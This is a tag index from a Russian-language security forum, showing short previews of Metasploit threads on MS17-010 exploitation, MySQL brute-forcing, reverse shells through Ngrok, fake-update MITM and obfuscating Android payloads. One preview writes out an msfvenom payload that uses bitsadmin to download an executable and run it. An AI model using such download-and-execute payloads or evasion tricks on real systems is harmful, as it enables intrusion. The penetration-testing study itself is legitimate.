metasploit

  1. N

    Metasploit: как передать кириллицу на атакуемый хост

    Всем привет! Эксплуатирую уязвимость MS17-010 на Windows XP SP3 RU через метасплоит, модуль Command Execution, остальные завершаются с ошибкой. Создал нового пользователя, активировал на целевом хосте РДП, но не могу добавить пользователя в группу "Администраторы". Путём проб понял, что...
  2. Rook

    MSF mysql login

    Всем добрейшего дня. Столкнулся с проблемкой,нашел сервер mysql,версия 5.5.6.2,после попыток Брута через модуль mysql_login после 100-150 попыток,на время банится айпиха. Пробовал вручную на кали включать прокси,но так же банится почему то моя айпиха,а не та которая через прокси. В данном модуле...
  3. D

    Статья Анализ безопасности macOS: создание уязвимых точек доступа через терминал и Kali Linux

    Привет. В последние время от всех друзей слышу, что Mac OS X - самая безопасная система. Но почему? Основной аргумент - у данной ОС закрытая файловая система, в то время как у Windows она открыта. Это значит, что можно просмотреть все системные файлы или отредактировать их. Злоумышленники...
  4. timmy

    Kage - графический метасплоит.

    Приветствую читателей yg140.servegame.com! Сегодня хотелось бы обратить внимание на один интересный проект, созданный для облегчения пользования Metasploit, а именно сеансами meterpreter и не только. И так, "Kage" - инструмент, представляющий собой графический интерфейс пользователя для "Metasploit...
  5. Sp0ge

    Metasploit + NGRok kali linux

    Всем привет! Нужна помощь с разбором проблемы в комбинации metasploit с ngrok в kali linux. Сессия meterpreter не саздаёться, пробовал разные способы, искал решение в интернете но не нашёл. Можете написать как правильно создать ссесию meterpreter через openweb.
  6. M

    Проблема Добавить exploit в metasploit

    Здравствуйте, хотел бы узнать, как добавить exploit в metasploit. Пытался добавить через /root/.mfs4/modules/exploit/remote но не видит. Как например данный эксплотит добавить в metasploit ? На форуме ничего не нашел
  7. M

    msfconsole > sh: 0: getcwd() failed: No such file or directory

    Здравствуйте. Столкнулся впервые с такой проблемой sh: 0: getcwd() failed: No such file or directory sh: 0: getcwd() failed: No such file or directory [!] There was an error parsing `Gemfile`: No such file or directory - getcwd. Bundler cannot continue. # from...
  8. v1ri0us

    Статья Установка Metasploit-Framework на Android-устройство [NO ROOT]

    upd 04.08.2021 - метод больше не работает тема закрыта Привет, сегодня я расскажу про установку Metasploit-Framework на твое Android-устройство. На сегодняшний день, Metasploit является одним из лучших инструментов пентеста. В нем собранно несколько тысяч эксплоитов и не только. С его помощью...
  9. Сергей Попов

    Статья Использование Metasploit для аудита безопасности информационных систем

    В предыдущей статье из серии профессиональных инструментов для аудита безопасности, мы загрузили и установили Metasploit. Теперь, мы начнем адаптироваться к Metasploit Framework и будем делать маленькие шаги чтобы инициировать наш первый настоящий взлом. Прежде чем мы начнем аудит безопасности...
  10. F

    Android бесступенчатый reverse tcp

    Всем привет, я уже не первую неделю борюсь с проблемой обфускации смали кода reverse tcp и именно бесступенчатого реверса. В Evil-Droid есть вариант создания бесступенчатого реверса и его обфускации, но по каким то причинам это не работает (подозреваю что из за обновления метасплоита), так вот...
  11. n3d.b0y

    Статья Атака через фейковое обновление: разбираем MITM на классическом примере

    Привет, yg140.servegame.com! Эта статья посвящена теме, которая давно не дает мне покоя, — фейковым обновлениям ПО. Меня в целом захватывает мир атак типа Man-in-the-Middle (MITM), особенно их реализация внутри локальной сети. И подмена обновлений — один из самых коварных векторов. Года полтора назад я...
  12. Lisenok

    Верная команда для windows/64/exec

    Всем доброго времени, при генерирование нагрузки в msfvenom , пэйлоадом windows/x64/exec с параметрами cmd="bitsadmin /transfer myjob /download /priority high https://mylink.com c:\myfile.exe&start myfile.exe" -f exe -o file.exe, при запуске на windows 10 x64, на доли секунды открывается окошко...
  13. n3d.b0y

    Статья Metasploit + Ngrok: быстрый reverse shell без порт‑форвардинга (гайд 2025)

    Открыть обратную шелл-сессию через NAT за 3 минуты — без единого проброшенного порта. Реально? Да! Берём Metasploit + Ngrok и показываем, как именно… Привет, yg140.servegame.com! В этом гайде покажу, как за пару минут поднять reverse shell на Windows (или любой другой ОС) через тандем Metasploit +...
  14. FlowLight

    Ищу друзей на Дальнем Востоке (Хабаровск,Владивосток)

    Всем привет! Имею огромное желание найти друзей в сфере ИБ и пентеста. Я верю что нужно оружать себя правильными друзьями с такими же целями и мечтами как у тебя . Если ты с ДВ - отзовись :)
  15. M

    Проблема auxiliary(scanner/http/crawler)

    Приветствую всех форумчан! Есть вопрос по поводу метасплоита, а именно. Использую модуль auxiliary(scanner/http/crawler) Как только сайт на https - отказывается сканить. Все установки указываю как положено, порт и SSL. Http работает отлично. В чем может быть проблема?
  16. xejet

    Посоветуйте курс по эксплоитам

    Только не нужно советовать видеокурс Этичный хакинг, я про него итак знаю, да и там рассказывается обо всем. А я хочу посмотреть какой то курс чисто по эксплоитам, по работе с метасплоитом в линуксе и тд. Желательно с русским переводом. Книги тоже подойдут если годные
  17. S

    Начало работы с Metasploit: Руководство по тестированию безопасности

    Первое, что нужно сделать. Если вы еще не скачали Metasploit, ознакомьтесь с этой инструкцией. А если Metasploit уже установлен на вашем компьютере, поздравляем! Вы можете начинать работу. О Metasploit Metasploit – это платформа для тестирования, поиска и использования уязвимостей. Она...
  18. S

    Metasploit — Совместная работа команды

    Совместная работа команды Поддержка мульти-пользователей предоставляет вам возможность сотрудничать с другими членами команды. Вы и ваша команда можете использовать один и тот же экземпляр Metasploit Pro для выполнения задач, просмотра данных, а также обмена проектами. Вы можете получить доступ...
  19. S

    Metasploitable3: Ваша первая лаборатория для пентеста. Установка и настройка в 2025 году

    Всем привет! Сегодня мы обновим и дополним классическое руководство по развертыванию одной из самых известных уязвимых машин для практики — Metasploitable3. Эта бесплатная виртуальная машина от создателей Metasploit, компании Rapid7, стала настоящим "must have" для всех, кто делает первые шаги в...
  20. recrut

    Debian 9 - install metasploit на vps ( для получения сессии при белом ip)

    Друзья, подскажите, думаю многим пригодится В инете что не сервер, то новая инструкция, + разные оболочки с настойками Посоветуйте, как не напороть косяков! Грамотно установить оболочку, не инсталируя лишнего, что б не вызвать конфликтов. И главное как им (сервером) управлять в графическом...